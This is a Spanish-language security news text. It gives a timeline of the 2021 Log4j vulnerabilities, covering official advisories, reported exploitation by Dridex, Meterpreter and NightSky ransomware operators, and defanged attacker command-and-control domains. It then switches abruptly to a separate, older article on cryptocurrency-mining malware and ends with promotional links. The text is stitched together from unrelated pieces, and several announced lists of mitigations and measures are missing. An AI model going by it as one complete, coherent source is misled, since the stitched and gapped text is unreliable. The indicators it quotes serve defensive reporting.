La vulnerabilidad de Apache Log4j ha sido titular en todo el mundo desde que se descubrió a principios de diciembre. La falla ha afectado a una gran cantidad de organizaciones en todo el mundo mientras los equipos de seguridad se apresuraban a mitigar los riesgos asociados. Aquí hay una cronología de los eventos clave en torno a la vulnerabilidad de Log4j a medida que se han desarrollado.
Apache publicó detalles sobre una vulnerabilidad crítica en Log4j, una biblioteca de registro utilizada en millones de aplicaciones basadas en Java. Los atacantes comenzaron a explotar la falla (CVE-2021-44228) – denominada «Log4Shell», que fue calificada con 10 sobre 10 en la escala de calificación de vulnerabilidades CVSS. Podría conducir a la ejecución remota de código (RCE) en los servidores subyacentes que ejecutan aplicaciones vulnerables. «Un atacante que pueda controlar los mensajes de registro o los parámetros de los mensajes de registro puede ejecutar código arbitrario cargado desde servidores LDAP cuando la sustitución de búsqueda de mensajes está habilitada», escribieron los desarrolladores de Apache en un aviso. Se puso a disposición una corrección para el problema con el lanzamiento de Log4j 2.15.0, mientras los equipos de seguridad de todo el mundo trabajaban para proteger sus organizaciones. Se instó a las empresas a instalar la versión más reciente.
A medida que continuaban las consecuencias de la vulnerabilidad, el Centro Nacional de Seguridad Cibernética (NCSC) del Reino Unido emitió una advertencia pública a las empresas británicas sobre la falla y describió estrategias de mitigación. El NCSC recomendó a todas las organizaciones instalar la última actualización de inmediato donde se supiera que se usaba Log4j. «Esta debería ser la primera prioridad para todas las organizaciones del Reino Unido que utilizan software que se sabe que incluye Log4j. Las organizaciones deben actualizar tanto el software orientado a Internet como el que no lo está», decía el comunicado. También se instó a las empresas a buscar instancias desconocidas de Log4j e implementar monitoreo/bloqueo de red protector.
Al igual que el NCSC del Reino Unido, la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) de EE. UU. respondió públicamente a la vulnerabilidad de Log4j, y su directora, Jen Easterly, reflexionó sobre el desafío urgente que presentaba para los defensores de redes. «CISA está trabajando estrechamente con nuestros socios de los sectores público y privado para abordar de manera proactiva una vulnerabilidad crítica que afecta a los productos que contienen la biblioteca de software Log4j», dijo en un comunicado. «Estamos tomando medidas urgentes para impulsar la mitigación de esta vulnerabilidad y detectar cualquier actividad de amenaza asociada. Hemos agregado esta vulnerabilidad a nuestro catálogo de vulnerabilidades explotadas conocidas, lo que obliga a las agencias civiles federales – y señala a los socios no federales – a parchear o remediar urgentemente esta vulnerabilidad. Nos estamos comunicando de manera proactiva con las entidades cuyas redes pueden ser vulnerables y estamos aprovechando nuestras herramientas de escaneo y detección de intrusiones para ayudar a los socios gubernamentales y de la industria a identificar la exposición o explotación de la vulnerabilidad».
CISA recomendó a los propietarios de activos tomar tres medidas adicionales e inmediatas para ayudar a mitigar la vulnerabilidad:
Se descubrió una segunda vulnerabilidad que afecta a Apache Log4j. El nuevo exploit, CVE 2021-45046, permitía a los actores maliciosos crear datos de entrada maliciosos utilizando un patrón de búsqueda JNDI para crear ataques de denegación de servicio (DoS), según la descripción de CVE. Se puso a disposición un nuevo parche para el exploit que eliminó el soporte para patrones de búsqueda de mensajes y deshabilitó la funcionalidad JNDI de forma predeterminada, ya que la corrección de Log4j 2.15.0 para la falla original estaba incompleta en ciertas configuraciones no predeterminadas.
«Si bien CVE-2021-45046 es menos grave que la vulnerabilidad original, se convierte en otro vector para que los actores de amenazas realicen ataques maliciosos contra sistemas sin parchear o mal parcheados», dijo Amy Chang, jefa de riesgo y respuesta en Resilience, a CSO poco después de que se descubriera la falla. «El parche incompleto de CVE-2021-44228 podría ser explotado para crear datos de entrada maliciosos, lo que podría resultar en un ataque de DoS. Un ataque de DoS puede apagar una máquina o red y hacerla inaccesible para sus usuarios previstos», agregó. Se recomendó a las organizaciones actualizar a Log4j: 2.16.0 lo antes posible.
Apache publicó detalles de una tercera vulnerabilidad importante de Log4j y puso a disposición otra corrección más. Esta era una falla de recursión infinita calificada con 7.5 sobre 10. «El equipo de Log4j ha sido informado de una vulnerabilidad de seguridad, CVE-2021-45105, que ha sido abordada en Log4j 2.17.0 para Java 8 en adelante», escribió. «Las versiones 2.0-alpha1 a 2.16.0 de Apache Log4j2 no protegían contra la recursión descontrolada de búsquedas autorreferenciales. Cuando la configuración de registro utiliza un Pattern Layout no predeterminado con una Context Lookup (por ejemplo, $${ctx:loginId}), los atacantes con control sobre los datos de entrada del Thread Context Map (MDC) pueden crear datos de entrada maliciosos que contienen una búsqueda recursiva, lo que resulta en un StackOverflowError que terminará el proceso. Esto también se conoce como un ataque de DoS (denegación de servicio)».
Apache también describió las siguientes mitigaciones:
El grupo de investigación en ciberseguridad Cryptolaemus advirtió que la vulnerabilidad de Log4j estaba siendo explotada para infectar dispositivos Windows con el troyano bancario Dridex y dispositivos Linux con Meterpreter. Dridex es una forma de malware que roba credenciales bancarias a través de un sistema que utiliza macros de Microsoft Word, mientras que Meterpreter es una carga útil de ataque de Metasploit que proporciona un shell interactivo desde el cual un atacante puede explorar una máquina objetivo y ejecutar código. Joseph Roosen, miembro de Cryptolaemus, dijo a BleepingComputer que los actores de amenazas utilizan la variante de exploit RMI (Invocación de Métodos Remotos) de Log4j para forzar a los dispositivos vulnerables a cargar y ejecutar una clase Java desde un servidor remoto controlado por el atacante.
Los datos publicados por el proveedor de ciberseguridad Tenable revelaron que uno de cada 10 activos era vulnerable a Log4Shell, mientras que el 30 % de las organizaciones no había comenzado a escanear en busca del fallo. «De los activos que se han evaluado, Log4Shell se ha encontrado en aproximadamente el 10 % de ellos, incluida una amplia gama de servidores, aplicaciones web, contenedores y dispositivos IoT», decía una publicación en el blog de Tenable. «Log4Shell es omnipresente en todas las industrias y geografías. Uno de cada 10 servidores corporativos expuestos. Una de cada 10 aplicaciones web, y así sucesivamente. Uno de cada 10 de casi todos los aspectos de nuestra infraestructura digital tiene el potencial de explotación maliciosa a través de Log4Shell».
El proveedor advirtió que Log4Shell conlleva una amenaza potencial mayor que EternalBlue (explotado en los ataques de WannaCry) debido a la omnipresencia de Log4j tanto en la infraestructura como en las aplicaciones. «Ninguna vulnerabilidad en la historia ha exigido tan abiertamente una remediación. Log4Shell definirá la informática tal como la conocemos, separando a quienes se esfuerzan por protegerse de quienes se sienten cómodos siendo negligentes», agregó.
La Comisión Federal de Comercio (FTC) instó a las organizaciones estadounidenses a aplicar el parche para la vulnerabilidad Log4Shell de inmediato o arriesgarse a enfrentar acciones punitivas por parte de la agencia. «Cuando se descubren y explotan vulnerabilidades, se corre el riesgo de pérdida o violación de información personal, pérdidas financieras y otros daños irreversibles. El deber de tomar medidas razonables para mitigar vulnerabilidades de software conocidas implica leyes que incluyen, entre otras, la Ley de la Comisión Federal de Comercio y la Ley Gramm-Leach-Bliley», dijo la FTC. Añadió que es fundamental que las empresas y sus proveedores que dependen de Log4j actúen ahora para reducir la probabilidad de daños a los consumidores y evitar acciones legales de la FTC. «La FTC tiene la intención de utilizar toda su autoridad legal para perseguir a las empresas que no tomen medidas razonables para proteger los datos de los consumidores contra la exposición como resultado de Log4j, o de vulnerabilidades conocidas similares en el futuro».
Microsoft actualizó su página de guía sobre la vulnerabilidad Log4j con detalles de un operador de ransomware con sede en China (DEV-0401) que apunta a sistemas expuestos a internet y despliega el ransomware NightSky. «Desde el 4 de enero, los atacantes comenzaron a explotar la vulnerabilidad CVE-2021-44228 en sistemas expuestos a internet que ejecutan VMware Horizon», escribió. «DEV-0401 ha desplegado previamente múltiples familias de ransomware, incluyendo LockFile, AtomSilo y Rook, y ha explotado de manera similar sistemas expuestos a internet que ejecutan Confluence (CVE-2021-26084) y servidores Exchange locales (CVE-2021-34473)». Según el análisis de Microsoft, se descubrió que los atacantes utilizaban servidores de comando y control (CnC) que suplantan dominios legítimos. Estos incluyen service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net y 139[.]180[.]217[.]203.
Seguridad 101: El impacto del malware de minería de criptomonedas
El gobierno australiano acaba de reconocer la moneda digital como un método de pago legal. Desde el 1 de julio, las compras realizadas con monedas digitales como bitcoin están exentas del Impuesto sobre Bienes y Servicios del país para evitar la doble tributación. Por lo tanto, los comerciantes e inversores no pagarán impuestos por comprarlas y venderlas a través de plataformas de intercambio legales.
Japón, que legitimó bitcoin como forma de pago en abril pasado, ya espera que más de 20.000 comerciantes acepten pagos con bitcoin. Otros países se están sumando a la tendencia, aunque parcialmente: empresas y algunas organizaciones públicas en Suiza, Noruega y los Países Bajos. En un estudio reciente, los usuarios activos únicos de billeteras de criptomonedas se estiman entre 2,9 y 5,8 millones, la mayoría de los cuales se encuentran en América del Norte y Europa.
¿Pero qué tiene que ver la aceptación y adopción de las monedas digitales con las amenazas en línea? Mucho, en realidad. A medida que criptomonedas como bitcoin ganan terreno en el mundo real, también lo harán las amenazas cibercriminales que abusan de ella. Pero, ¿cómo exactamente? ¿Qué significa esto para las empresas y los usuarios comunes?
La criptomoneda es una cadena de datos cifrados que denota una unidad de moneda. Es monitoreada y organizada por una red peer-to-peer también conocida como blockchain, que también sirve como un libro de contabilidad seguro de transacciones, por ejemplo, compra, venta y transferencia. A diferencia del dinero físico, las criptomonedas están descentralizadas, lo que significa que no son emitidas por gobiernos u otras instituciones financieras.
Las criptomonedas se crean (y aseguran) mediante algoritmos criptográficos que se mantienen y confirman en un proceso llamado minería, donde una red de computadoras o hardware especializado como los circuitos integrados de aplicación específica (ASIC) procesan y validan las transacciones. El proceso incentiva a los mineros que operan la red con la criptomoneda.
En realidad hay más de 700 criptomonedas, pero solo algunas se negocian fácilmente y aún menos tienen una capitalización de mercado superior a los 100 millones de dólares. Bitcoin, por ejemplo, fue creado por Satoshi Nakamoto (seudónimo) y lanzado en 2009 como código abierto. La tecnología blockchain hizo que todo funcionara, proporcionando un sistema donde las estructuras de datos (bloques) se transmiten, validan y registran en una base de datos pública y distribuida a través de una red de puntos de comunicación (nodos).
Si bien bitcoin es la criptomoneda más famosa, hay otras alternativas populares. Ethereum llevó los «contratos inteligentes» un paso más allá al hacer que los lenguajes de programación necesarios para codificarlos fueran más accesibles para los desarrolladores. Los acuerdos, o transacciones condicionales/si-entonces, se escriben como código y se ejecutan (siempre que se cumplan los requisitos) en la blockchain de Ethereum.
Ethereum, sin embargo, ganó notoriedad después de que un hacker explotara una vulnerabilidad en la Organización Autónoma Digital (DAO) que se ejecuta en el software de Ethereum, desviando ether por valor de 50 millones de dólares estadounidenses (la moneda de Ethereum). Esto resultó en el desarrollo de Ethereum Classic, basado en la blockchain original, y Ethereum, su versión mejorada (mediante un hard fork).
También hay otras criptomonedas notables: Litecoin, Dogecoin, Monero. Litecoin es una supuesta mejora técnica de Bitcoin que es capaz de realizar transacciones más rápidas gracias a su algoritmo de minería Scrypt (Bitcoin utiliza SHA-256). La red Litecoin es capaz de producir 84 millones de litecoins, cuatro veces más unidades de criptomoneda que las emitidas por Bitcoin. Monero es notable por su uso de firmas de anillo (un tipo de firma digital) y del protocolo de capa de aplicación CryptoNote para proteger la privacidad de sus transacciones: monto, origen y destino. Dogecoin, que fue desarrollado inicialmente con fines educativos o de entretenimiento, estaba destinado a un grupo demográfico más amplio. Capaz de generar dogecoins sin límite, también utiliza Scrypt para impulsar la moneda.
Las criptomonedas no tienen fronteras: cualquiera puede enviarlas en cualquier momento y lugar, sin demoras ni cargos adicionales u ocultos de intermediarios. Debido a su naturaleza, están más seguras contra el fraude y el robo de identidad, ya que las criptomonedas no pueden falsificarse y la información personal está detrás de un muro criptográfico.
Desafortunadamente, la misma aparente rentabilidad, conveniencia y seudonimato de las criptomonedas también las hizo ideales para los ciberdelincuentes, como lo demostraron los operadores de ransomware. La creciente popularidad de las criptomonedas coincide con las incidencias de malware que infecta sistemas y dispositivos, convirtiéndolos en ejércitos de máquinas de minería de criptomonedas.
La minería de criptomonedas es una tarea computacionalmente intensiva que requiere recursos significativos de procesadores dedicados, tarjetas gráficas y otro hardware. Si bien la minería genera dinero, hay muchas salvedades. La ganancia es relativa a la inversión del minero en el hardware, sin mencionar los costos de electricidad necesarios para su funcionamiento.
Las criptomonedas se minan en bloques; en bitcoin, por ejemplo, cada vez que se resuelven cierto número de hashes, la cantidad de bitcoins que se puede otorgar al minero por bloque se reduce a la mitad. Dado que la red de bitcoin está diseñada para generar la criptomoneda cada 10 minutos, la dificultad de resolver otro hash se ajusta. Y a medida que el poder de minería aumenta, el requisito de recursos para minar un nuevo bloque se acumula. Los pagos son relativamente pequeños y eventualmente disminuyen cada cuatro años: en 2016, la recompensa por minar un bloque se redujo a la mitad a 12,5 BTC (o 32.000 dólares al 5 de julio de 2017). En consecuencia, muchos se unen en pools para hacer la minería más eficiente. Las ganancias se dividen entre el grupo, dependiendo del esfuerzo que haya realizado cada minero.
Los malhechores recurren al uso de malware para sortear estos desafíos. Sin embargo, hay una advertencia para los mineros cibercriminales: los dispositivos y máquinas conectados a internet, aunque son lo suficientemente rápidos para procesar datos de red, no tienen amplias capacidades de cómputo numérico. Para compensar esto, el malware de minería de criptomonedas está diseñado para zombificar botnets de computadoras para realizar estas tareas. Otros prescindieron de la sutileza por completo: en 2014, el clúster de supercomputadoras Odyssey de Harvard fue utilizado para minar dogecoins ilícitamente. Durante el mismo año, un incidente similar ocurrió con las supercomputadoras de la Fundación Nacional de Ciencias de EE. UU. A principios de febrero de 2017, uno de los servidores de la Reserva Federal de EE. UU. fue utilizado indebidamente para minar bitcoins.
El malware de minería de criptomonedas emplea el mismo modus operandi que muchas otras amenazas, desde correos spam cargados de malware y descargas desde URL maliciosas hasta junkware y aplicaciones potencialmente no deseadas (PUA). En enero de 2014, se explotó una vulnerabilidad en la red de anuncios basada en Java de Yahoo!, exponiendo a los usuarios finales europeos a malvertisements que entregaban un malware de minería de bitcoins. Un mes antes, las autoridades alemanas arrestaron a hackers por presuntamente usar malware para minar bitcoins por valor de más de 954.000 dólares.
Hemos visto la aparición de herramientas de hacking y backdoors relacionados con la minería cibercriminal de bitcoins ya en 2011, y desde entonces hemos visto una variedad de amenazas de minería de criptomonedas que agregan más capacidades, como la denegación de servicio distribuida y la suplantación de URL. Otra incluso intentó hacerse pasar por un componente de uno de los productos de Trend Micro. En 2014, la amenaza se trasladó a los dispositivos Android como Kagecoin, capaz de minar bitcoin, litecoin y dogecoin. Un troyano de acceso remoto (RAT) njrat/Njw0rm, ampliamente compartido en el underground de Oriente Medio fue modificado para agregar funcionalidad de minería de bitcoins. Lo mismo se hizo con un antiguo RAT de Java que puede minar litecoin.
Hasta ahora, los malware notables de minería de criptomonedas de este año son Adylkuzz, CPUMiner/EternalMiner y Linux.MulDrop.14. Todos explotan vulnerabilidades. Adylkuzz aprovecha EternalBlue, la misma falla de seguridad que el ransomware WannaCry usó con efectos destructivos, mientras que CPUMiner/EternalMiner usó SambaCry, una vulnerabilidad en el paquete de software de interoperabilidad Samba. Linux.MulDrop.14, un troyano de Linux, apunta a dispositivos Raspberry Pi. Estas amenazas infectaron dispositivos y máquinas y los convirtieron en botnets de minería de monero.
El malware de minería de criptomonedas roba los recursos de las máquinas infectadas, afectando significativamente su rendimiento y aumentando su desgaste. Una infección también implica otros costos, como un mayor consumo de energía.
Pero también hemos descubierto que su impacto va más allá de los problemas de rendimiento. Del 1 de enero al 24 de junio de 2017, nuestros sensores detectaron 4.894 mineros de bitcoins que desencadenaron más de 460.259 actividades de minería de bitcoins, y descubrieron que más del 20% de estos mineros también desencadenaron ataques web y basados en red. Incluso encontramos intentos de intrusión vinculados al vector de ataque de un ransomware. Los ataques más prevalentes que observamos fueron:
Estos malware pueden amenazar la disponibilidad, integridad y seguridad de una red o sistema, lo que potencialmente puede resultar en interrupciones de las operaciones críticas de una empresa. El robo de información y el secuestro del sistema también son repercusiones preocupantes. Estos ataques también pueden ser el conducto a través del cual se distribuye malware adicional.
Los dispositivos de Internet de las Cosas (IoT) también están en el punto de mira del malware de minería de criptomonedas, desde grabadores de video digitales (DVR)/cámaras de vigilancia, decodificadores, dispositivos de almacenamiento conectado a la red (NAS) y especialmente routers, dada su ubicuidad en entornos domésticos y corporativos. En abril de 2017, una variante de Mirai surgió con capacidades de minería de bitcoins. La notoriedad de Mirai surgió de la devastación que causó en los dispositivos IoT, particularmente en los routers domésticos, utilizándolos para dejar fuera de línea sitios de alto perfil el año pasado. Durante los primeros tres trimestres de 2016, detectamos un ejército zombie de minería de bitcoins compuesto por sistemas Windows, routers domésticos y cámaras IP.
Del 1 de enero al 24 de junio de 2017, también observamos diferentes tipos de dispositivos que estaban minando bitcoin, aunque nuestra telemetría no puede verificar si estas actividades estaban autorizadas. También vimos que las actividades de minería de bitcoins aumentaron un 40%, de 1.800 eventos diarios desencadenados en febrero a 3.000 en marzo de 2017.
Si bien la minería de bitcoins no es inherentemente ilegal (al menos en muchos países), puede implicar un compromiso si no cuenta con el conocimiento y consentimiento del propietario. Descubrimos que las máquinas con Windows registraron la mayor cantidad de actividades de minería de bitcoins, pero también son dignos de mención:
[LEER: Cómo proteger tu router contra Mirai y los ataques a redes domésticas]
El malware de minería de criptomonedas puede deteriorar el rendimiento del sistema y exponer a los usuarios finales y a las empresas al robo de información, al secuestro y a una plétora de otros malware. Y al convertir estas máquinas en zombies, el malware de criptomonedas puede incluso hacer inadvertidamente que sus víctimas sean parte del problema.
De hecho, su impacto adverso en los dispositivos que infectan —y en última instancia en los activos de una empresa o los datos de un usuario— los convierte en una amenaza creíble. No existe una bala de plata para estos malware, pero se pueden mitigar siguiendo estas mejores prácticas:
Los administradores de TI/sistemas y los profesionales de la seguridad de la información también pueden considerar listas blancas de aplicaciones o mecanismos de seguridad similares que impidan que ejecutables sospechosos se ejecuten o se instalen. Monitorear proactivamente el tráfico de red ayuda a identificar mejor las señales de alerta que pueden indicar una infección de malware. Aplicar el principio de privilegio mínimo, desarrollar contramedidas contra inyecciones web, asegurar la puerta de enlace de correo electrónico, implementar mejores prácticas para dispositivos móviles corporativos y cultivar una fuerza laboral consciente de la ciberseguridad son parte de un enfoque de defensa en profundidad para reducir la exposición de una empresa a estas amenazas. Sin embargo, en última instancia, la seguridad de los dispositivos conectados a Internet contra el malware de minería de criptomonedas no es solo una carga para sus usuarios. Los fabricantes de diseño original y de equipos también desempeñan funciones vitales para asegurar los ecosistemas en los que operan.
Telegram: https://t.me/cryptodeeptech
Vídeo: https://youtu.be/PNDBjoT83zA
Fuente: https://cryptodeeptech.ru/log4j-vulnerability
